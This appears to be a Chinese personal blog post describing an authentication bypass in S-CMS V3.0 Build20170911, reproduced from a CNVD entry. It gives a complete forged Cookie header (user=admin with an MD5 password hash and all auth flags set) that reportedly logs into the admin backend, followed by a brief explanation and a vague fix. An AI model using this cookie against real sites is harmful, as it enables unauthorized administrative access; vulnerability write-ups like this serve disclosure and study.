Walks

网络安全爱好者

S-CMS V3.0 Build20170911后台存在认证绕过漏洞

前言:
逛CNVD的时候看到了cookie欺骗的漏洞,复现了一下,想到自己的博客好像没有这方面的文章,所以写了一篇发上来。

目录:
0x01:漏洞描述
0x02:影响产品
0x03:如何利用


漏洞描述:

S-CMS是淄博闪灵网络科技有限公司开发的一款企业建站系统。

S-CMS v3.0 build20170911后台存在认证绕过漏洞,由于系统未能对Cookie信息进行准确校验,攻击者可通过导入任意cookie值绕过登录验证。


影响产品:

S-CMS V3.0 Build20170911


如何利用:

Cookie: 
ASPSESSIONIDQASRCBRQ=MPDOKIKACAJIMAMACBEJKEFO; authorization2=0%7C0%7Cs11%7Cs12%7Cs13%7Cs14%7Cs15%7Cs19%7Cs28%7Cs29%7Cs37%7Cs42%7Cs52%7Cx3%7Cx11; 
authorization=fail; auth=1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1; pass=21232F297A57A5A743894A0E4A801FC3; user=admin


自己的理解与如何修复:

理解:cookie欺骗,就是作者没有注意登陆时的权限验证,导致我们输入一个固定的cookie就可以登陆该cms的大部分网站,在国内的网站中,cookie一般都会存在很久,所以如果我们通过一些网络通信的手段,盗取别人的cookie,等同于别人的账号就在我们手上。

修复:验证复杂点就可,让攻击者无法猜解出来


成果图:

《S-CMS V3.0 Build20170911后台存在认证绕过漏洞》

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

93 − 88 =